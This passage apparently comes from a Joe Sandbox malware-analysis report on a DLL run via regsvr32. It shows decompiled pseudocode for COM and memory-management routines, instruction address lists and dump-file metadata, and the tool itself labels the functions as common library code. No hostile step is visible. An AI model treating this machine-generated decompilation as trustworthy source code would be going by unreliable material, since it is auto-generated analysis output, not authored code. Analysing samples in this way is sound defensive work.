				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				char _v124;
				char _v168;
				char _v176;
				char _v184;
				intOrPtr _v196;
				signed int* __ebp;
				signed int _t132;
				signed int _t138;
				signed int _t139;
				void* _t140;
				intOrPtr* _t145;
				intOrPtr* _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr* _t152;
				void* _t154;
				intOrPtr* _t158;
				signed int _t163;
				intOrPtr _t164;
				intOrPtr* _t166;
				intOrPtr* _t168;
				void* _t179;
				intOrPtr _t182;
				signed int _t183;
				signed int _t185;
				signed int* _t186;
				void* _t187;
				intOrPtr* _t188;
				signed int _t202;
				signed int _t204;
				intOrPtr _t214;
				intOrPtr _t220;
				intOrPtr* _t222;
				intOrPtr _t223;
				signed int _t225;
				void* _t228;
				void* _t229;
				void* _t231;
				void* _t232;

				_t188 = __ecx;
				_t181 = __ebx;
				_t232 = _t231 - 0x74;
				_t225 =  &_v124;
				_t132 =  *0x100b9e70; // 0xbb35530
				_a116 = _t132 ^ _t225;
				_push(0x1c);
				E1004764D(0x10090734, __ebx, __edi, __esi);
				_t222 = __ecx;
				_v16 =  *((intOrPtr*)(__ecx + 0x14));
				_a4 =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t138 =  *(__ecx + 8);
					__eflags = _t138;
					if(_t138 != 0) {
						_t215 =  &_a12;
						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x100a429c,  &_a12,  &_a8);
						__eflags = _t139;
						if(_t139 >= 0) {
							E1002D337( &_a12,  &_a20, 0x100a6910);
							_a52 = _a52 | 0xffffffff;
							_a44 = 0;
							_a48 = 0;
							_a56 = 0x18;
							_a60 = 0;
							_a64 = 0x1fb;
							E1002D337( &_a12,  &_a68, 0x100a6838);
							_t145 = _a12;
							_a100 = _a100 | 0xffffffff;
							_t215 =  &_a20;
							_a92 = 0x1c;
							_a96 = 0;
							_a104 = 0x20;
							_a108 = 0;
							_a112 = 0x1e;
							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
							__eflags = _t183;
							if(_t183 >= 0) {
								_t215 = 0;
								_v40 = _a8;
								_t148 = _a12;
								_v36 = 1;
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
								__eflags = _t149;
								 *_t225 = _t149;
								if(_t149 >= 0) {
									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
									_t151 = _v20;
									_a8 = _t151;
									 *(_t222 + 0x10) = _t151;
									_t152 = _a12;
									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
									 *((intOrPtr*)( *_t152 + 8))(_t152);
									goto L32;
								} else {
									_t166 = _a12;
									 *((intOrPtr*)( *_t166 + 8))(_t166);
								}
								goto L50;
							} else {
								_t168 = _a12;
								 *((intOrPtr*)( *_t168 + 8))(_t168);
								_t139 = _t183;
							}
						}
					} else {
						_t139 = 0;
					}
					goto L51;
				} else {
					__eax =  *(__esi + 0x4c);
					__ecx =  *__eax;
					__edx =  &_a16;
					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x100a616c, __edx);
					__eflags = __eax;
					 *__ebp = __eax;
					if(__eax < 0) {
						L51:
						 *[fs:0x0] = _v12;
						_pop(_t220);
						_pop(_t223);
						_pop(_t182);
						_t140 = E1004763E(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
						__eflags =  &_a120;
						return _t140;
					} else {
						__eax = _a16;
						__ecx =  *__eax;
						__edx =  &_a8;
						_push( &_a8);
						_push(0x100a611c);
						_push(__eax);
						__eflags = __eax;
						if(__eflags >= 0) {
							__eax = _a8;
							__edx =  &_a12;
							_push( &_a12);
							_push(0x100a628c);
							_a12 = 0;
							__ecx =  *__eax;
							_push(__eax);
							__eflags = __eax;
							if(__eflags >= 0) {
								__eax = _a12;
								__ecx =  *__eax;
								__edx = __esi + 0x58;
								__edx =  *(__esi + 4);
								__edx =  *(__esi + 4) + 0xe8;
								__eflags = __edx;
								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
								__eax = _a12;
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
							}
							__eax = _a8;
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						}
						__eax = E10009F14(__eflags, 0x14);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E10030855(__eax, _a16);
						}
						 *(__esi + 0x50) = __eax;
						__eax = _a16;
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						__eax =  *(__esi + 0x50);
						__ecx =  *__eax;
						__eflags =  *__eax - __edi;
						if(__eflags != 0) {
							__eflags = __eax;
							__eax = E1002D6F5(__ecx, __eax);
						}
						__eax = E10009F14(__eflags, 0x28);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E1002C138(__eax, __edi, 0x1f40);
						}
						__edx =  *(__esi + 0x50);
						 *(__esi + 0x54) = __eax;
						_push( *( *(__esi + 0x50)));
						__ecx = __eax;
						__eax =  *(__esi + 0x54);
						__ecx =  *(__esi + 0x50);
						 *(__ecx + 8) =  *(__esi + 0x54);
						__eax =  *(__esi + 0x54);
						__eax =  *( *(__esi + 0x54) + 0xc);
						__eflags = __eax - 0x3333333;
						 *(__esi + 0x10) = __eax;
						if(__eax <= 0x3333333) {
							__eax = __eax * 0x28;
							__imp__CoTaskMemAlloc(__eax);
							__ecx = 0;
							__eflags = __eax - __edi;
							__ecx = 0 | __eflags != 0x00000000;
							 *(__esi + 0x14) = __eax;
							if(__eflags != 0) {
								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
								__eax = E10049170(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
								__ecx =  *(__esi + 0x50);
								__eax = E10030877( *(__esi + 0x50));
								__ecx =  *(__esi + 0x50);
								__eax = E1002D5A1(__ecx);
								L32:
								__eflags =  *(_t222 + 0x10);
								_a16 = 0;
								if( *(_t222 + 0x10) > 0) {
									_t187 = 0;
									__eflags = 0;
									do {
										_t163 = E10009F14(__eflags, 0x1c);
										_a8 = _t163;
										__eflags = _t163;
										_v4 = 0;
										if(_t163 == 0) {
											_t164 = 0;
											__eflags = 0;
										} else {
											_t164 = E100222C1(_t163, 0xa);
										}
										_v4 = _v4 | 0xffffffff;
										_a16 = _a16 + 1;
										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
										_t187 = _t187 + 0x28;
										__eflags = _a16 -  *(_t222 + 0x10);
									} while (__eflags < 0);
								}
								_t185 = _v16;
								__eflags = _t185;
								if(_t185 != 0) {
									__eflags = _a4;
									if(_a4 > 0) {
										_t154 = 0xffffffdc;
										_t186 = _t185 + 0x24;
										_a16 = _a4;
										_a8 = _t154 - _v16;
										while(1) {
											_t202 =  *( *_t186 + 4);
											__eflags = _t202;
											_a4 = _t202;
											if(_t202 == 0) {
												goto L46;
											}
											while(1) {
												_t158 = E10012115( &_a4);
												_t215 =  *_t222;
												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
												__eflags = _a4;
												if(_a4 == 0) {
													goto L46;
												}
											}
											L46:
											E100221A7( *_t186);
											_t204 =  *_t186;
											__eflags = _t204;
											if(_t204 != 0) {
												 *((intOrPtr*)( *_t204 + 4))(1);
											}
											_t186 =  &(_t186[0xa]);
											_t127 =  &_a16;
											 *_t127 = _a16 - 1;
											__eflags =  *_t127;
											if( *_t127 != 0) {
												continue;
											}
											goto L49;
										}
									}
									L49:
									__imp__CoTaskMemFree(_v16);
								}
								L50:
								_t139 =  *_t225;
								goto L51;
							} else {
								_push(_t225);
								_t228 = _t232;
								_push(_t188);
								_v168 = 0x100b84e8;
								L10048E48( &_v168, 0x100afe38);
								asm("int3");
								_push(_t228);
								_t229 = _t232;
								_push(_t188);
								_v176 = 0x100b8580;
								L10048E48( &_v176, 0x100afeec);
								asm("int3");
								_push(_t229);
								_push(_t188);
								_v184 = 0x100b8618;
								L10048E48( &_v184, 0x100aff30);
								asm("int3");
								_push(4);
								E1004764D(0x1008dd26, _t181, 0, _t222);
								_t214 = E10020454(0x104);
								_v196 = _t214;
								_t179 = 0;
								_v184 = 0;
								if(_t214 != 0) {
									_t179 = E1001DB72(_t214);
								}
								return E10047725(_t179);
							}
						} else {
							__eax = 0x8007000e;
							goto L51;
						}
					}
				}
			}



















































                                                                                                                0x10031021
                                                                                                                0x10031021
                                                                                                                0x10031022
                                                                                                                0x10031025
                                                                                                                0x10031029
                                                                                                                0x10031030
                                                                                                                0x10031033
                                                                                                                0x1003103a
                                                                                                                0x1003103f
                                                                                                                0x10031044
                                                                                                                0x1003104f
                                                                                                                0x10031052
                                                                                                                0x10031197
                                                                                                                0x1003119a
                                                                                                                0x1003119c
                                                                                                                0x100311ab
                                                                                                                0x100311b5
                                                                                                                0x100311b8
                                                                                                                0x100311ba
                                                                                                                0x100311cb
                                                                                                                0x100311d0
                                                                                                                0x100311df
                                                                                                                0x100311e2
                                                                                                                0x100311e5
                                                                                                                0x100311ec
                                                                                                                0x100311ef
                                                                                                                0x100311f6
                                                                                                                0x100311fb
                                                                                                                0x100311fe
                                                                                                                0x10031205
                                                                                                                0x1003120b
                                                                                                                0x10031212
                                                                                                                0x10031215
                                                                                                                0x1003121c
                                                                                                                0x1003121f
                                                                                                                0x1003122c
                                                                                                                0x1003122e
                                                                                                                0x10031230
                                                                                                                0x10031249
                                                                                                                0x1003124c
                                                                                                                0x1003124f
                                                                                                                0x10031255
                                                                                                                0x1003125c
                                                                                                                0x1003125f
                                                                                                                0x10031262
                                                                                                                0x10031268
                                                                                                                0x1003126b
                                                                                                                0x1003126d
                                                                                                                0x10031270
                                                                                                                0x10031286
                                                                                                                0x10031289
                                                                                                                0x1003128c
                                                                                                                0x1003128f
                                                                                                                0x10031292
                                                                                                                0x10031295
                                                                                                                0x1003129b
                                                                                                                0x00000000
                                                                                                                0x10031272
                                                                                                                0x10031272
                                                                                                                0x10031278
                                                                                                                0x10031278
                                                                                                                0x00000000
                                                                                                                0x10031232
                                                                                                                0x10031232
                                                                                                                0x10031238
                                                                                                                0x1003123b
                                                                                                                0x1003123b
                                                                                                                0x10031230
                                                                                                                0x1003119e
                                                                                                                0x1003119e
                                                                                                                0x1003119e
                                                                                                                0x00000000
                                                                                                                0x10031058
                                                                                                                0x10031058
                                                                                                                0x1003105b
                                                                                                                0x1003105d
                                                                                                                0x10031067
                                                                                                                0x1003106a
                                                                                                                0x1003106c
                                                                                                                0x1003106f
                                                                                                                0x1003135f
                                                                                                                0x10031362
                                                                                                                0x1003136a
                                                                                                                0x1003136b
                                                                                                                0x1003136c
                                                                                                                0x10031372
                                                                                                                0x10031377
                                                                                                                0x1003137b
                                                                                                                0x10031075
                                                                                                                0x10031075
                                                                                                                0x10031078
                                                                                                                0x1003107a
                                                                                                                0x1003107d
                                                                                                                0x1003107e
                                                                                                                0x10031083
                                                                                                                0x10031086
                                                                                                                0x10031088
                                                                                                                0x1003108a
                                                                                                                0x1003108d
                                                                                                                0x10031090
                                                                                                                0x10031091
                                                                                                                0x10031096
                                                                                                                0x10031099
                                                                                                                0x1003109b
                                                                                                                0x1003109f
                                                                                                                0x100310a1
                                                                                                                0x100310a3
                                                                                                                0x100310a6
                                                                                                                0x100310a8
                                                                                                                0x100310ac
                                                                                                                0x100310af
                                                                                                                0x100310af
                                                                                                                0x100310b7
                                                                                                                0x100310ba
                                                                                                                0x100310bd
                                                                                                                0x100310c0
                                                                                                                0x100310c0
                                                                                                                0x100310c3
                                                                                                                0x100310c6
                                                                                                                0x100310c9
                                                                                                                0x100310c9
                                                                                                                0x100310ce
                                                                                                                0x100310d3
                                                                                                                0x100310d6
                                                                                                                0x100310e4
                                                                                                                0x100310e4
                                                                                                                0x100310d8
                                                                                                                0x100310db
                                                                                                                0x100310dd
                                                                                                                0x100310dd
                                                                                                                0x100310e6
                                                                                                                0x100310e9
                                                                                                                0x100310ec
                                                                                                                0x100310ef
                                                                                                                0x100310f2
                                                                                                                0x100310f5
                                                                                                                0x100310f7
                                                                                                                0x100310f9
                                                                                                                0x100310fb
                                                                                                                0x10031100
                                                                                                                0x10031100
                                                                                                                0x10031107
                                                                                                                0x1003110c
                                                                                                                0x1003110f
                                                                                                                0x10031120
                                                                                                                0x10031120
                                                                                                                0x10031111
                                                                                                                0x10031117
                                                                                                                0x10031119
                                                                                                                0x10031119
                                                                                                                0x10031122
                                                                                                                0x10031125
                                                                                                                0x10031128
                                                                                                                0x1003112a
                                                                                                                0x10031131
                                                                                                                0x10031134
                                                                                                                0x10031137
                                                                                                                0x1003113a
                                                                                                                0x1003113d
                                                                                                                0x10031140
                                                                                                                0x10031145
                                                                                                                0x10031148
                                                                                                                0x10031154
                                                                                                                0x10031158
                                                                                                                0x1003115e
                                                                                                                0x10031160
                                                                                                                0x10031162
                                                                                                                0x10031165
                                                                                                                0x1003116a
                                                                                                                0x10031174
                                                                                                                0x1003117a
                                                                                                                0x1003117f
                                                                                                                0x10031185
                                                                                                                0x1003118a
                                                                                                                0x1003118d
                                                                                                                0x1003129e
                                                                                                                0x1003129e
                                                                                                                0x100312a1
                                                                                                                0x100312a4
                                                                                                                0x100312a6
                                                                                                                0x100312a6
                                                                                                                0x100312a8
                                                                                                                0x100312aa
                                                                                                                0x100312b0
                                                                                                                0x100312b3
                                                                                                                0x100312b5
                                                                                                                0x100312b8
                                                                                                                0x100312c5
                                                                                                                0x100312c5
                                                                                                                0x100312ba
                                                                                                                0x100312be
                                                                                                                0x100312be
                                                                                                                0x100312c7
                                                                                                                0x100312ce
                                                                                                                0x100312d1
                                                                                                                0x100312d8
                                                                                                                0x100312db
                                                                                                                0x100312db
                                                                                                                0x100312a8
                                                                                                                0x100312e0
                                                                                                                0x100312e3
                                                                                                                0x100312e5
                                                                                                                0x100312e7
                                                                                                                0x100312ea
                                                                                                                0x100312f1
                                                                                                                0x100312f2
                                                                                                                0x100312f8
                                                                                                                0x100312fb
                                                                                                                0x10031303
                                                                                                                0x10031305
                                                                                                                0x10031308
                                                                                                                0x1003130a
                                                                                                                0x1003130d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10031314
                                                                                                                0x10031321
                                                                                                                0x10031328
                                                                                                                0x1003132f
                                                                                                                0x10031332
                                                                                                                0x10031335
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10031311
                                                                                                                0x10031337
                                                                                                                0x10031339
                                                                                                                0x1003133e
                                                                                                                0x10031340
                                                                                                                0x10031342
                                                                                                                0x10031348
                                                                                                                0x10031348
                                                                                                                0x1003134b
                                                                                                                0x1003134e
                                                                                                                0x1003134e
                                                                                                                0x1003134e
                                                                                                                0x10031351
                                                                                                                0x00000000
                                                                                                                0x10031300
                                                                                                                0x00000000
                                                                                                                0x10031351
                                                                                                                0x10031303
                                                                                                                0x10031353
                                                                                                                0x10031356
                                                                                                                0x10031356
                                                                                                                0x1003135c
                                                                                                                0x1003135c
                                                                                                                0x00000000
                                                                                                                0x1003116c
                                                                                                                0x1000a035
                                                                                                                0x1000a036
                                                                                                                0x1000a038
                                                                                                                0x1000a042
                                                                                                                0x1000a049
                                                                                                                0x1000a04e
                                                                                                                0x1000a04f
                                                                                                                0x1000a050
                                                                                                                0x1000a052
                                                                                                                0x1000a05c
                                                                                                                0x1000a063
                                                                                                                0x1000a068
                                                                                                                0x1000a069
                                                                                                                0x1000a06c
                                                                                                                0x1000a076
                                                                                                                0x1000a07d
                                                                                                                0x1000a082
                                                                                                                0x1000a083
                                                                                                                0x1000a08a
                                                                                                                0x1000a099
                                                                                                                0x1000a09b
                                                                                                                0x1000a09e
                                                                                                                0x1000a0a2
                                                                                                                0x1000a0a5
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0b1
                                                                                                                0x1000a0b1
                                                                                                                0x1003114a
                                                                                                                0x1003114a
                                                                                                                0x00000000
                                                                                                                0x1003114a
                                                                                                                0x10031148
                                                                                                                0x1003106f

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2459298410-0
                                                                                                                • Opcode ID: 4d3413a104903adc487147c2f6ae4262965eb4dc0bde21966797196adfeb7cfa
                                                                                                                • Instruction ID: e6cd7100d48519fc696e8c7b9946abb7a63435d6b082dadc42d981e32a129eca
                                                                                                                • Opcode Fuzzy Hash: 4d3413a104903adc487147c2f6ae4262965eb4dc0bde21966797196adfeb7cfa
                                                                                                                • Instruction Fuzzy Hash: 82C11574600609EFCB14CFA8C8849AEB7F6FF88305F24891AF916CB691DB71E945CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10031EF2 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E10031EF2(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t99;
				intOrPtr* _t119;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t143;
				intOrPtr* _t149;
				intOrPtr* _t157;
				intOrPtr _t158;
				intOrPtr _t159;
				void* _t160;
				void* _t161;
				intOrPtr _t163;
				intOrPtr* _t164;
				void* _t165;
				intOrPtr _t177;

				_push(0x10);
				E1004764D(0x10090813, __ebx, __edi, __esi);
				_t163 = __ecx;
				 *((intOrPtr*)(_t165 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1009dfec;
				 *(_t165 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t163 + 0x24)) != 0) {
						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x1c)) + 8));
						__eflags = _t157;
						if(_t157 == 0) {
							break;
						}
						_t149 =  *_t157;
						__eflags = _t149;
						if(_t149 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t149 + 0xbc))( *((intOrPtr*)(_t157 + 8)), 0);
						 *((intOrPtr*)( *_t157 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t165 - 0x18)) = _t163 + 0x18;
					E100221A7(_t163 + 0x18);
					if( *((intOrPtr*)(_t163 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t163 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t163 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t163 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t163 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t134 =  *((intOrPtr*)(_t163 + 0x54));
							if( *((intOrPtr*)(_t163 + 0x54)) != 0) {
								E100308DE(_t134,  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x50)))));
								E1002C161( *((intOrPtr*)(_t163 + 0x54)));
							}
							_t158 =  *((intOrPtr*)(_t163 + 0x54));
							_t189 = _t158;
							if(_t158 != 0) {
								E1002C161(_t158);
								_push(_t158);
								E10009F3F(0, _t158, _t163, _t189);
							}
							_t159 =  *((intOrPtr*)(_t163 + 0x50));
							_t190 = _t159;
							if(_t159 != 0) {
								E10031CB5(_t159, _t190);
								_push(_t159);
								E10009F3F(0, _t159, _t163, _t190);
							}
							_t86 =  *((intOrPtr*)(_t163 + 0x4c));
							if(_t86 != 0) {
								_t86 =  *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t164 =  *((intOrPtr*)(_t163 + 0x48));
							if(_t164 != 0) {
								_t86 =  *((intOrPtr*)( *_t164 + 8))(_t164);
							}
							 *(_t165 - 4) =  *(_t165 - 4) | 0xffffffff;
							return E10047725(E100222E4(_t86, 0,  *((intOrPtr*)(_t165 - 0x18)), _t155));
						} else {
							 *((intOrPtr*)(_t165 - 0x10)) = 0;
							if( *((intOrPtr*)(_t163 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t163 + 0x14)));
								goto L32;
							}
							_t160 = 0;
							do {
								_t99 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x14)) + _t160 + 0x24)) + 4));
								 *((intOrPtr*)(_t165 - 0x14)) = _t99;
								if(_t99 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E10012115(_t165 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t165 - 0x14)) != 0);
								L28:
								E100221A7( *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x14)) + _t160 + 0x24)));
								_t143 =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x14)) + _t160 + 0x24));
								if(_t143 != 0) {
									 *((intOrPtr*)( *_t143 + 4))(1);
								}
								 *((intOrPtr*)(_t165 - 0x10)) =  *((intOrPtr*)(_t165 - 0x10)) + 1;
								_t160 = _t160 + 0x28;
							} while ( *((intOrPtr*)(_t165 - 0x10)) <  *((intOrPtr*)(_t163 + 0x10)));
							goto L31;
						}
					}
					_t161 = 0;
					if( *((intOrPtr*)(_t163 + 0x38)) <= 0) {
						L17:
						if(_t177 != 0) {
							_push( *((intOrPtr*)(_t163 + 0x3c)));
							E10009F3F(0, _t161, _t163, _t177);
							_push( *((intOrPtr*)(_t163 + 0x40)));
							E10009F3F(0, _t161, _t163, _t177);
						}
						goto L19;
					}
					 *((intOrPtr*)(_t165 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t163 + 0x40)) +  *((intOrPtr*)(_t165 - 0x10)));
						 *((intOrPtr*)(_t165 - 0x10)) =  *((intOrPtr*)(_t165 - 0x10)) + 0x10;
						_t161 = _t161 + 1;
					} while (_t161 <  *((intOrPtr*)(_t163 + 0x38)));
					_t177 =  *((intOrPtr*)(_t163 + 0x38));
					goto L17;
				}
				_t119 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t119 == 0) {
					goto L11;
				}
				_t120 =  *_t119;
				_t155 = _t165 - 0x14;
				_push(_t165 - 0x14);
				_push(0x100a611c);
				_push(_t120);
				if( *((intOrPtr*)( *_t120))() < 0) {
					goto L11;
				}
				_t122 =  *((intOrPtr*)(_t165 - 0x14));
				if(_t122 == 0) {
					goto L11;
				}
				_t155 = _t165 - 0x10;
				_push(_t165 - 0x10);
				_push(0x100a628c);
				 *((intOrPtr*)(_t165 - 0x10)) = 0;
				_push(_t122);
				if( *((intOrPtr*)( *_t122 + 0x10))() >= 0) {
					_t126 =  *((intOrPtr*)(_t165 - 0x10));
					if(_t126 != 0) {
						 *((intOrPtr*)( *_t126 + 0x18))(_t126,  *((intOrPtr*)(__ecx + 0x58)));
						_t128 =  *((intOrPtr*)(_t165 - 0x10));
						 *((intOrPtr*)( *_t128 + 8))(_t128);
					}
				}
				_t124 =  *((intOrPtr*)(_t165 - 0x14));
				 *((intOrPtr*)( *_t124 + 8))(_t124);
				goto L11;
			}

























                                                                                                                0x10031ef2
                                                                                                                0x10031ef9
                                                                                                                0x10031efe
                                                                                                                0x10031f00
                                                                                                                0x10031f03
                                                                                                                0x10031f0e
                                                                                                                0x10031f11
                                                                                                                0x00000000
                                                                                                                0x10031f97
                                                                                                                0x10031f76
                                                                                                                0x10031f79
                                                                                                                0x10031f7b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10031f7d
                                                                                                                0x10031f7f
                                                                                                                0x10031f81
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10031f89
                                                                                                                0x10031f91
                                                                                                                0x10031f91
                                                                                                                0x10031f9f
                                                                                                                0x10031fa2
                                                                                                                0x10031faa
                                                                                                                0x10031fe4
                                                                                                                0x10031fe4
                                                                                                                0x10031fe9
                                                                                                                0x10031fee
                                                                                                                0x10031fee
                                                                                                                0x10031ff1
                                                                                                                0x10031ff6
                                                                                                                0x10031ffb
                                                                                                                0x10031ffb
                                                                                                                0x10032001
                                                                                                                0x10032070
                                                                                                                0x10032070
                                                                                                                0x10032075
                                                                                                                0x10032078
                                                                                                                0x10032078
                                                                                                                0x1003207e
                                                                                                                0x10032083
                                                                                                                0x1003208a
                                                                                                                0x10032092
                                                                                                                0x10032092
                                                                                                                0x10032097
                                                                                                                0x1003209a
                                                                                                                0x1003209c
                                                                                                                0x100320a0
                                                                                                                0x100320a5
                                                                                                                0x100320a6
                                                                                                                0x100320ab
                                                                                                                0x100320ac
                                                                                                                0x100320af
                                                                                                                0x100320b1
                                                                                                                0x100320b5
                                                                                                                0x100320ba
                                                                                                                0x100320bb
                                                                                                                0x100320c0
                                                                                                                0x100320c1
                                                                                                                0x100320c6
                                                                                                                0x100320cb
                                                                                                                0x100320cb
                                                                                                                0x100320ce
                                                                                                                0x100320d3
                                                                                                                0x100320d8
                                                                                                                0x100320d8
                                                                                                                0x100320de
                                                                                                                0x100320ec
                                                                                                                0x10032003
                                                                                                                0x10032006
                                                                                                                0x10032009
                                                                                                                0x10032067
                                                                                                                0x1003206a
                                                                                                                0x00000000
                                                                                                                0x1003206a
                                                                                                                0x1003200b
                                                                                                                0x1003200d
                                                                                                                0x10032014
                                                                                                                0x10032019
                                                                                                                0x1003201c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003201e
                                                                                                                0x1003201e
                                                                                                                0x10032033
                                                                                                                0x10032033
                                                                                                                0x1003203b
                                                                                                                0x10032042
                                                                                                                0x1003204a
                                                                                                                0x10032050
                                                                                                                0x10032056
                                                                                                                0x10032056
                                                                                                                0x10032059
                                                                                                                0x1003205f
                                                                                                                0x10032062
                                                                                                                0x00000000
                                                                                                                0x1003200d
                                                                                                                0x10032001
                                                                                                                0x10031fac
                                                                                                                0x10031fb1
                                                                                                                0x10031fd0
                                                                                                                0x10031fd0
                                                                                                                0x10031fd2
                                                                                                                0x10031fd5
                                                                                                                0x10031fda
                                                                                                                0x10031fdd
                                                                                                                0x10031fe3
                                                                                                                0x00000000
                                                                                                                0x10031fd0
                                                                                                                0x10031fb3
                                                                                                                0x10031fb6
                                                                                                                0x10031fbd
                                                                                                                0x10031fc3
                                                                                                                0x10031fc7
                                                                                                                0x10031fc8
                                                                                                                0x10031fcd
                                                                                                                0x00000000
                                                                                                                0x10031fcd
                                                                                                                0x10031f17
                                                                                                                0x10031f1c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10031f1e
                                                                                                                0x10031f22
                                                                                                                0x10031f25
                                                                                                                0x10031f26
                                                                                                                0x10031f2b
                                                                                                                0x10031f30
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10031f32
                                                                                                                0x10031f37
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10031f39
                                                                                                                0x10031f3c
                                                                                                                0x10031f3d
                                                                                                                0x10031f42
                                                                                                                0x10031f47
                                                                                                                0x10031f4d
                                                                                                                0x10031f4f
                                                                                                                0x10031f54
                                                                                                                0x10031f5c
                                                                                                                0x10031f5f
                                                                                                                0x10031f65
                                                                                                                0x10031f65
                                                                                                                0x10031f54
                                                                                                                0x10031f68
                                                                                                                0x10031f6e
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
